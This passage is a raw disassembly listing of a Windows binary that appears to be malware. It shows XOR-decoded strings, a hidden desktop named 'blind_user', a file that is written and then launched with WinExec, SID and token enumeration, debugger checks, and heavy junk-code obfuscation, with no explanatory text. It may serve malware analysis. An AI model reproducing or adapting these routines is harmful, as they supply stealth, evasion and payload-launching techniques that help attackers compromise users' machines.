call sub_40C9F8
add esp, 38h
call sub_40C4C4 ; GetCurrentThreadId
loc_40434F: ; CODE XREF: sub_4041B6+10A�j
lea eax, [ebp-1497h]
push eax
call sub_40C488 ; DeleteFileA
call sub_40C548 ; GetTickCount
push 0
push 80h
push 2
push 0
push 0
push 40000000h
lea eax, [ebp-11FDh]
push eax
call sub_40C650 ; CreateFileA
mov [ebp-1398h], eax
push 39h
push offset aMppraAdemUOxma ; "ڌꠄœގꠉœ"...
call sub_404129
lea edi, [ebp-11FDh]
push edi
lea edi, [ebp-12FCh]
sub_404313 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40439D proc near ; DATA XREF: sub_43F74D+223�o
push edi
lea edi, [ebp-12FCh]
push edi
push eax
lea edi, [ebp-10FEh]
push edi
call sub_40C9D4
add esp, 1Ch
call sub_40C4C4 ; GetCurrentThreadId
lea ecx, [ebp-10FEh]
or eax, 0FFFFFFFFh
loc_4043C3: ; CODE XREF: sub_40439D+2B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4043C3
push 0
lea esi, [ebp-14A8h]
push esi
push eax
lea edi, [ebp-10FEh]
push edi
push dword ptr [ebp-1398h]
call sub_40C6C8 ; WriteFile
mov ebx, 3203h
mov eax, 0D54h
mul ebx
mov [ebp-14B0h], eax
mov eax, [ebp-14B0h]
mov ebx, eax
push dword ptr [ebp-1398h]
call sub_40C530 ; CloseHandle
mov ebx, 7567h
mov eax, 67ECh
mul ebx
mov [ebp-14B4h], eax
mov eax, [ebp-14B4h]
mov ebx, eax
push 8
push offset aUGU ; "œϣœ"
call sub_404129
add esp, 8
lea edi, [ebp-11FDh]
push edi
lea edi, [ebp-0FFh]
push edi
push eax
lea edi, [ebp-10FEh]
push edi
call sub_40C9D4
add esp, 10h
lea edi, [ebp-14A9h]
lea esi, byte_442259
mov ecx, 1
rep movsb
push 0
lea eax, [ebp-10FEh]
push eax
call sub_40C6BC ; WinExec
pop edi
pop esi
pop ebx
leave
retn
sub_40439D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_442264
lea eax, ds:430C70h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_4044B5
; ---------------------------------------------------------------------------
loc_40449E: ; CODE XREF: .text:004044B7�j
mov eax, dword_442264
add eax, edi
lea eax, ds:430C70h[eax]
movsx edx, byte ptr [eax]
xor edx, 22h
mov [eax], dl
inc edi
loc_4044B5: ; CODE XREF: .text:0040449C�j
cmp edi, esi
jl short loc_40449E
mov eax, dword_442264
add eax, esi
mov byte ptr ds:dword_430C70[eax], 0
mov edi, dword_442264
mov eax, edi
add eax, 5
add eax, esi
mov dword_442264, eax
add dword_442264, 3
cmp dword_442264, 0DEDh
jle short loc_4044F4
and dword_442264, 0
loc_4044F4: ; CODE XREF: .text:004044EB�j
and dword ptr [ebp-4], 0
lea eax, dword_430C70[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404502 proc near ; CODE XREF: sub_4062A9+209�p
; sub_408C55+E3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
call sub_40C518 ; GetProcessHeap
cmp dword_442268, 0
jz short loc_40454C
call sub_40C554 ; GetVersion
call sub_40C4C4 ; GetCurrentThreadId
push eax
call sub_40C7DC ; GetThreadDesktop
mov [ebp+var_8], eax
mov [ebp+var_4], 642Eh
sub [ebp+var_4], 2DB0h
mov eax, dword_442268
cmp [ebp+var_8], eax
jnz short loc_40457F
call sub_40C548 ; GetTickCount
xor eax, eax
inc eax
jmp short loc_40458C
; ---------------------------------------------------------------------------
loc_40454C: ; CODE XREF: sub_404502+13�j
push 0
push 0C7h
push 0
push 0
push 0
push offset aBlind_user ; "blind_user"
call sub_40C7C4 ; CreateDesktopA
mov dword_442268, eax
call sub_40C548 ; GetTickCount
cmp dword_442268, 0
jnz short loc_40457A
xor eax, eax
jmp short loc_40458C
; ---------------------------------------------------------------------------
loc_40457A: ; CODE XREF: sub_404502+72�j
call sub_40C554 ; GetVersion
loc_40457F: ; CODE XREF: sub_404502+3E�j
push dword_442268
call sub_40C7D0 ; SetThreadDesktop
mov edi, eax
loc_40458C: ; CODE XREF: sub_404502+48�j
; sub_404502+76�j
pop edi
pop esi
leave
retn
sub_404502 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404590 proc near ; CODE XREF: sub_4062A9+290�p
; sub_408C55+15E�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_40C554 ; GetVersion
mov eax, [ebp+arg_0]
lea edx, aBlind_user ; "blind_user"
mov [eax+8], edx
mov [ebp+var_2], 4A26h
movzx eax, [ebp+var_2]
imul eax, 0D6Fh
mov [ebp+var_2], ax
leave
retn
sub_404590 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045BB proc near ; CODE XREF: sub_404657+8E�p
; sub_40470D+9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 1B1h
push esi
push [ebp+arg_0]
mov eax, dword_442274
lea eax, ds:417650h[eax]
push eax
call sub_40C998
add esp, 0Ch
xor edi, edi
jmp short loc_404604
sub_4045BB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4045EF
loc_4045EA: ; CODE XREF: sub_4045EF+17�j
mov eax, dword_442274
; END OF FUNCTION CHUNK FOR sub_4045EF
; =============== S U B R O U T I N E =======================================
sub_4045EF proc near ; DATA XREF: sub_43F74D+4B8�o
; FUNCTION CHUNK AT 004045EA SIZE 00000005 BYTES
add eax, edi
lea eax, ds:417650h[eax]
movsx edx, byte ptr [eax]
xor edx, 0E5h
mov [eax], dl
inc edi
loc_404604: ; CODE XREF: sub_4045BB+2D�j
cmp edi, esi
jl short loc_4045EA
mov dword ptr [ebp-8], 21h
mov eax, dword_442274
add eax, esi
mov byte ptr ds:dword_417650[eax], 0
mov edi, dword_442274
inc dword_442274
mov eax, dword_442274
lea eax, [eax+esi+3]
mov dword_442274, eax
cmp eax, 0E0Ch
jle short loc_404646
and dword_442274, 0
loc_404646: ; CODE XREF: sub_4045EF+4E�j
mov dword ptr [ebp-0Ch], 1CAh
lea eax, dword_417650[edi]
pop edi
pop esi
leave
retn
sub_4045EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404657 proc near ; CODE XREF: sub_405636+6D8�p
; sub_405636+768�p ...
var_112 = byte ptr -112h
var_111 = byte ptr -111h
var_110 = byte ptr -110h
var_10D = byte ptr -10Dh
var_107 = byte ptr -107h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 124h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
lea edi, [ebp+var_107]
lea esi, a@rva2g ; "|@rVA2g"
movsd
movsd
push [ebp+arg_4]
push ebx
call sub_40C9F8
add esp, 8
lea edi, [ebp+var_10D]
lea esi, aAsfA ; "SF="
mov ecx, 3
rep movsw
lea edi, [ebp+var_110]
lea esi, a1 ; " 1"
mov ecx, 3
rep movsb
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_4047AB
mov [ebp+var_112], 3Eh
movzx eax, [ebp+var_112]
imul eax, 5F6Ah
mov [ebp+var_112], al
mov [ebp+var_FF], 0
push 3
push offset asc_4473F4 ; ""
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
mov [ebp+var_111], 0
jmp short loc_404758
sub_404657 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40470D
loc_4046FD: ; CODE XREF: sub_40470D+53�j
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
; END OF FUNCTION CHUNK FOR sub_40470D
; =============== S U B R O U T I N E =======================================
sub_40470D proc near ; DATA XREF: sub_43F74D+600�o
; FUNCTION CHUNK AT 004046FD SIZE 00000010 BYTES
jge short loc_404751
push 4
push offset aCJ ; ""
call sub_4045BB
mov [ebp-11Ch], eax
call sub_40C9BC
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-11Ch]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C9D4
add esp, 18h
loc_404751: ; CODE XREF: sub_40470D�j
add byte ptr [ebp-111h], 1
loc_404758: ; CODE XREF: sub_404657+A4�j
mov al, [ebp-111h]
cmp al, 0Ah
jb short loc_4046FD
call sub_40C4C4 ; GetCurrentThreadId
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40C9F8
push 3
push offset asc_4473EB ; ""
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 18h
mov dword ptr [ebp-118h], 3D0h
mov eax, 3732h
mul dword ptr [ebp-118h]
mov [ebp-120h], eax
mov [ebp-118h], eax
loc_4047AB: ; CODE XREF: sub_404657+60�j
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404881
mov word ptr [ebp-112h], 18E9h
inc word ptr [ebp-112h]
push 10h
push offset aUdcJJJR ; ""
call sub_4045BB
mov [ebp-118h], eax
call sub_40C9BC
mov [ebp-11Ch], eax
call sub_40C9BC
mov [ebp-120h], eax
call sub_40C9BC
mov [ebp-124h], eax
call sub_40C9BC
mov ecx, 0EA60h
cdq
idiv ecx
push edx
mov edi, [ebp-124h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-120h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-11Ch]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-118h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C9D4
call sub_40C4B8 ; GetCurrentProcessId
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40C9F8
add esp, 28h
call sub_40C554 ; GetVersion
loc_404881: ; CODE XREF: sub_40470D+AE�j
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_40493E
call sub_40C5D8 ; IsDebuggerPresent
push 0Ah
push offset aJJJsq ; ""
call sub_4045BB
mov [ebp-11Ch], eax
call sub_40C9BC
mov [ebp-120h], eax
call sub_40C9BC
mov [ebp-124h], eax
call sub_40C9BC
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-124h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-120h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-11Ch]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C9D4
lea edi, [ebp-117h]
lea esi, aLw ; "&:; lw"
mov ecx, 7
rep movsb
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40C9F8
add esp, 24h ; DATA XREF: sub_43F74D+41D�r
call sub_40C4C4 ; GetCurrentThreadId
loc_40493E: ; CODE XREF: sub_40470D+184�j
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404966
push 2
push offset aSq ; ""
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
loc_404966: ; CODE XREF: sub_40470D+241�j
call sub_40C548 ; GetTickCount
pop edi
pop esi
pop ebx
leave
retn
sub_40470D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404970 proc near ; CODE XREF: sub_405636+1A0�p
; sub_405636+1C3�p ...
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_129 = dword ptr -129h
var_125 = byte ptr -125h
var_11F = byte ptr -11Fh
var_11E = byte ptr -11Eh
var_10D = dword ptr -10Dh
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov [ebp+var_104], 3E27h
mov eax, [ebp+var_104]
mov edx, eax
add edx, eax
mov [ebp+var_104], edx
push [ebp+arg_4]
push ebx
call sub_40C9F8
add esp, 8
call sub_40C4C4 ; GetCurrentThreadId
mov eax, dword_442290
mov [ebp+var_10D], eax
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404B69
call sub_40C548 ; GetTickCount
mov [ebp+var_FF], 0
lea edi, [ebp+var_125]
lea esi, aDQA ; "d~q <a"
mov ecx, 7
rep movsb
push 5
push offset asc_4473C6 ; DATA XREF: sub_43F74D+2A�o
; ""
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
call sub_40C518 ; GetProcessHeap
mov [ebp+var_11E], 0
jmp loc_404B2E
; ---------------------------------------------------------------------------
loc_404A11: ; CODE XREF: sub_404970+1C6�j
call sub_40C4C4 ; GetCurrentThreadId
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404A6A
push 4
push offset aCJ ; ""
call sub_4045BB
mov [ebp+var_130], eax ; DATA XREF: sub_44014E+12�o
call sub_40C9BC
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+var_130]
push edi
lea edi, [ebp+var_FF]
push edi
call sub_40C9D4
add esp, 18h
loc_404A6A: ; CODE XREF: sub_404970+B6�j
call sub_40C4E8 ; RtlGetLastWin32Error
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404AC3
push 4
push offset aCJ ; ""
call sub_4045BB
mov [ebp+var_134], eax
call sub_40C9BC
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+var_134]
push edi
lea edi, [ebp+var_FF]
push edi
call sub_40C9D4
add esp, 18h
loc_404AC3: ; CODE XREF: sub_404970+10F�j
mov eax, dword_44229B
mov [ebp+var_129], eax
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 7
jge short loc_404B22
push 4
push offset aCJ ; ""
call sub_4045BB
mov [ebp+var_138], eax
call sub_40C9BC
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+var_138]
push edi
lea edi, [ebp+var_FF]
push edi
call sub_40C9D4
add esp, 18h
loc_404B22: ; CODE XREF: sub_404970+16E�j
call sub_40C548 ; GetTickCount
add [ebp+var_11E], 1
loc_404B2E: ; CODE XREF: sub_404970+9C�j
mov al, [ebp+var_11E]
cmp al, 0Ah
jb loc_404A11
lea eax, [ebp+var_FF]
push eax
push ebx
call sub_40C9F8
call sub_40C4C4 ; GetCurrentThreadId
push 4
push offset asc_4473C1 ; ""
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 18h
call sub_40C4B8 ; GetCurrentProcessId
loc_404B69: ; CODE XREF: sub_404970+55�j
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404D19
mov [ebp+var_11F], 0CBh
movzx eax, [ebp+var_11F]
imul eax, 46B4h
mov [ebp+var_11F], al
mov [ebp+var_FF], 0
sub_404970 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404BA0 proc near ; DATA XREF: sub_44014E+143�o
call sub_40C4B8 ; GetCurrentProcessId
mov byte ptr [ebp-11Eh], 0
jmp loc_404CFB
; ---------------------------------------------------------------------------
loc_404BB1: ; CODE XREF: sub_404BA0+163�j
mov byte ptr [ebp-120h], 0E9h
add byte ptr [ebp-120h], 1
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404C13
push 4
push offset aCJ ; ""
call sub_4045BB
mov [ebp-134h], eax
call sub_40C9BC
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-134h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C9D4
add esp, 18h
loc_404C13: ; CODE XREF: sub_404BA0+2F�j
mov word ptr [ebp-122h], 21DBh
add word ptr [ebp-122h], 3752h
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404C79
push 4
push offset aCJ ; ""
call sub_4045BB
mov [ebp-138h], eax
call sub_40C9BC
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-138h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C9D4
add esp, 18h
loc_404C79: ; CODE XREF: sub_404BA0+95�j
lea edi, [ebp-12Dh]
lea esi, aHs ; " hS "
mov ecx, 5
rep movsb
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 3
jge short loc_404CE0
push 4
push offset aCJ ; ""
call sub_4045BB
mov [ebp-13Ch], eax
call sub_40C9BC
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-13Ch]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40C9D4
add esp, 18h
loc_404CE0: ; CODE XREF: sub_404BA0+FC�j
mov dword ptr [ebp-128h], 6204h
add dword ptr [ebp-128h], 58FBh
add byte ptr [ebp-11Eh], 1
loc_404CFB: ; CODE XREF: sub_404BA0+C�j
mov al, [ebp-11Eh]
cmp al, 32h
jb loc_404BB1
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40C9F8
add esp, 8
loc_404D19: ; CODE XREF: sub_404970+209�j
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404D41
push 4
push offset aZc ; "ه"
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
loc_404D41: ; CODE XREF: sub_404BA0+189�j
mov word ptr [ebp-108h], 725Fh
movzx eax, word ptr [ebp-108h]
imul eax, 2514h
mov [ebp-108h], ax
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short sub_404D86
sub_404BA0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404D70 proc near ; DATA XREF: .data:0043F4E9�o
push 3
push offset aZ_1 ; "ه"
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
sub_404D70 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404D86 proc near ; CODE XREF: sub_404BA0+1CE�j
; DATA XREF: .data:0043F45B�o
lea edi, [ebp-10Eh]
lea esi, byte_4422A4
xor ecx, ecx
inc ecx
rep movsb
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404DBF
push 3
push offset aR_0 ; "ِ"
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
loc_404DBF: ; CODE XREF: sub_404D86+21�j
mov byte ptr [ebp-109h], 0F1h
movzx eax, byte ptr [ebp-109h]
imul eax, 35FDh
mov [ebp-109h], al
call sub_40C9BC
mov ecx, 0Ah
sub_404D86 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404DE3 proc near ; DATA XREF: sub_43F2FC+6�o
cdq
idiv ecx
cmp edx, 5
jge short loc_404E01
push 3
push offset aM_0 ; "ٌ"
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
loc_404E01: ; CODE XREF: sub_404DE3+6�j
lea edi, [ebp-115h]
lea esi, aOVunh ; "O+Vunh"
mov ecx, 7
rep movsb
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E3C
push 4
push offset aM ; "ʌ"
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
loc_404E3C: ; CODE XREF: sub_404DE3+41�j
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E64
push 4
push offset aZ ; "ʇ"
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
loc_404E64: ; CODE XREF: sub_404DE3+69�j
call sub_40C518 ; GetProcessHeap
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E91
push 4
push offset aR ; "ʐ"
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
loc_404E91: ; CODE XREF: sub_404DE3+96�j
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404EB9
push 7
push offset aGkls ; "ʃ"
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
loc_404EB9: ; CODE XREF: sub_404DE3+BE�j
mov byte ptr [ebp-105h], 0FCh
movzx eax, byte ptr [ebp-105h]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-105h], al
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404EFB
push 8
push offset aJalsac ; "ن"
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
loc_404EFB: ; CODE XREF: sub_404DE3+100�j
call sub_40C4B8 ; GetCurrentProcessId
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404F28
push 9
push offset aJalsac_0 ; "ʆ"
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
loc_404F28: ; CODE XREF: sub_404DE3+12D�j
lea edi, [ebp-11Dh]
lea esi, aXC6l ; " X c6L="
movsd
movsd
call sub_40C9BC
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404F5E
push 2
push offset aSq ; ""
call sub_4045BB
push eax
push ebx
call sub_40C9F8
add esp, 10h
loc_404F5E: ; CODE XREF: sub_404DE3+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_404DE3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F63 proc near ; CODE XREF: sub_405004+65�p
; sub_405004+BA�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 202h
push esi
push [ebp+arg_0]
mov eax, dword_4422BC
lea eax, ds:436170h[eax]
push eax
call sub_40C998
add esp, 0Ch
mov [ebp+var_8], 3ADh
xor edi, edi
jmp short loc_404FB2
; ---------------------------------------------------------------------------
loc_404F98: ; CODE XREF: sub_404F63+51�j
mov eax, dword_4422BC
add eax, edi
lea eax, ds:436170h[eax]
movsx edx, byte ptr [eax]
xor edx, 0FDh
mov [eax], dl
inc edi
loc_404FB2: ; CODE XREF: sub_404F63+33�j
cmp edi, esi
jl short loc_404F98
mov eax, dword_4422BC
add eax, esi
mov byte ptr ds:dword_436170[eax], 0
mov edi, dword_4422BC
add dword_4422BC, 2
mov eax, dword_4422BC
lea eax, [eax+esi+3]
mov dword_4422BC, eax
add dword_4422BC, 3
cmp dword_4422BC, 0E05h
jle short loc_404FFA
and dword_4422BC, 0
loc_404FFA: ; CODE XREF: sub_404F63+8E�j
lea eax, dword_436170[edi]
pop edi
pop esi
leave
retn
sub_404F63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405004 proc near ; CODE XREF: sub_4051C3+73�p
var_26 = byte ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov [ebp+var_18], 5D42h
movzx eax, [ebp+var_18]
imul eax, 1E96h
mov [ebp+var_18], ax
call sub_40C548 ; GetTickCount
xor ebx, ebx
inc ebx
push [ebp+arg_0]
call sub_40C920 ; GetSidIdentifierAuthority
mov [ebp+var_14], eax
call sub_40C4B8 ; GetCurrentProcessId
push [ebp+arg_0]
call sub_40C938 ; GetSidSubAuthorityCount
movzx edi, byte ptr [eax]
mov [ebp+var_10], edi
mov eax, 0Ch
mul [ebp+var_10]
mov [ebp+var_20], eax
add eax, 1Ch
mov [ebp+var_C], eax
mov ax, word_4422C0
mov [ebp+var_1A], ax
push 6
push offset aOSi ; "ؑ"
call sub_404F63
push ebx
push eax
push [ebp+arg_4]
call sub_40C800 ; wsprintfA
add esp, 14h
mov [ebp+var_C], eax
mov [ebp+var_15], 2
movzx eax, [ebp+var_15]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_15], al
mov eax, [ebp+var_C]
add eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_14]
cmp byte ptr [eax], 0
jnz short loc_4050A6
cmp byte ptr [eax+1], 0
jz short loc_405110
loc_4050A6: ; CODE XREF: sub_405004+9A�j
lea edi, [ebp+var_26]
lea esi, aG84rg ; "G84rg"
mov ecx, 3
rep movsw
push 20h
push offset aEXeXeXeXeXeXe ; "ͅϕϕϕϕϕϕ"
call sub_404F63
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx esi, si
push esi
movzx esi, byte ptr [edi+4]
movzx esi, si
push esi
movzx esi, byte ptr [edi+3]
movzx esi, si
push esi
movzx esi, byte ptr [edi+2]
movzx esi, si
push esi
movzx esi, byte ptr [edi+1]
movzx esi, si
push esi
movzx edi, byte ptr [edi]
movzx edi, di
push edi
push eax
push [ebp+var_8]
call sub_40C800 ; wsprintfA
add esp, 28h
mov ebx, eax
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
jmp short loc_40516B
; ---------------------------------------------------------------------------
loc_405110: ; CODE XREF: sub_405004+A0�j
call sub_40C4B8 ; GetCurrentProcessId
push 3
push offset aSi_0 ; "ؑ"
call sub_404F63
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx edx, byte ptr [edi+4]
shl edx, 8
add esi, edx
movzx edx, byte ptr [edi+3]
shl edx, 10h
add esi, edx
movzx edi, byte ptr [edi+2]
shl edi, 18h
add esi, edi
push esi
push eax
push [ebp+var_8]
call sub_40C800 ; wsprintfA
add esp, 14h
mov ebx, eax
mov [ebp+var_24], 24B2h
sub [ebp+var_24], 5B87h
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
loc_40516B: ; CODE XREF: sub_405004+10A�j
and [ebp+var_4], 0
jmp short loc_4051B6
; ---------------------------------------------------------------------------
loc_405171: ; CODE XREF: sub_405004+1B8�j
call sub_40C5D8 ; IsDebuggerPresent
push 4
push offset aSi ; "ؑ"
call sub_404F63
mov [ebp+var_24], eax
push [ebp+var_4]
push [ebp+arg_0]
call sub_40C92C ; GetSidSubAuthority
push dword ptr [eax]
mov edi, [ebp+var_24]
push edi
push [ebp+var_8]
call sub_40C800 ; wsprintfA
add esp, 14h
mov ebx, eax
call sub_40C554 ; GetVersion
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
inc [ebp+var_4]
loc_4051B6: ; CODE XREF: sub_405004+16B�j
mov eax, [ebp+var_10]
cmp [ebp+var_4], eax
jb short loc_405171
pop edi
pop esi
pop ebx
leave
retn
sub_405004 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4051C3 proc near ; CODE XREF: sub_405F5E+231�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push edi
call sub_40C4E8 ; RtlGetLastWin32Error
call sub_40C4B8 ; GetCurrentProcessId
mov edi, eax
push edi
push 0
push 1F0FFFh
call sub_40C620 ; OpenProcess
mov edi, eax
lea eax, [ebp+var_4]
push eax
push 0F00FFh
push edi
call sub_40C8A8 ; OpenProcessToken
push edi
call sub_40C530 ; CloseHandle
call sub_40C4C4 ; GetCurrentThreadId
mov eax, dword_4422B8
add eax, 3FF5h
push eax
push 40h
call sub_40C5FC ; LocalAlloc
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov eax, dword_4422B8
add eax, 3FF5h
push eax
push edi
push 1
push [ebp+var_4]
call sub_40C8B4 ; GetTokenInformation
call sub_40C554 ; GetVersion
push [ebp+arg_0]
push dword ptr [edi]
call sub_405004
add esp, 8
call sub_40C4C4 ; GetCurrentThreadId
push edi
call sub_40C608 ; LocalFree
call sub_40C4C4 ; DATA XREF: sub_440559�r
push [ebp+var_4] ; DATA XREF: sub_440565�r
call sub_40C530 ; DATA XREF: sub_440571�r
call sub_40C4C4 ; DATA XREF: sub_44057D�r
pop edi
locret_40525C: ; DATA XREF: sub_440589�r
leave
retn
sub_4051C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40525E proc near ; CODE XREF: sub_40538B+48�p
; sub_40538B+BF�p ...
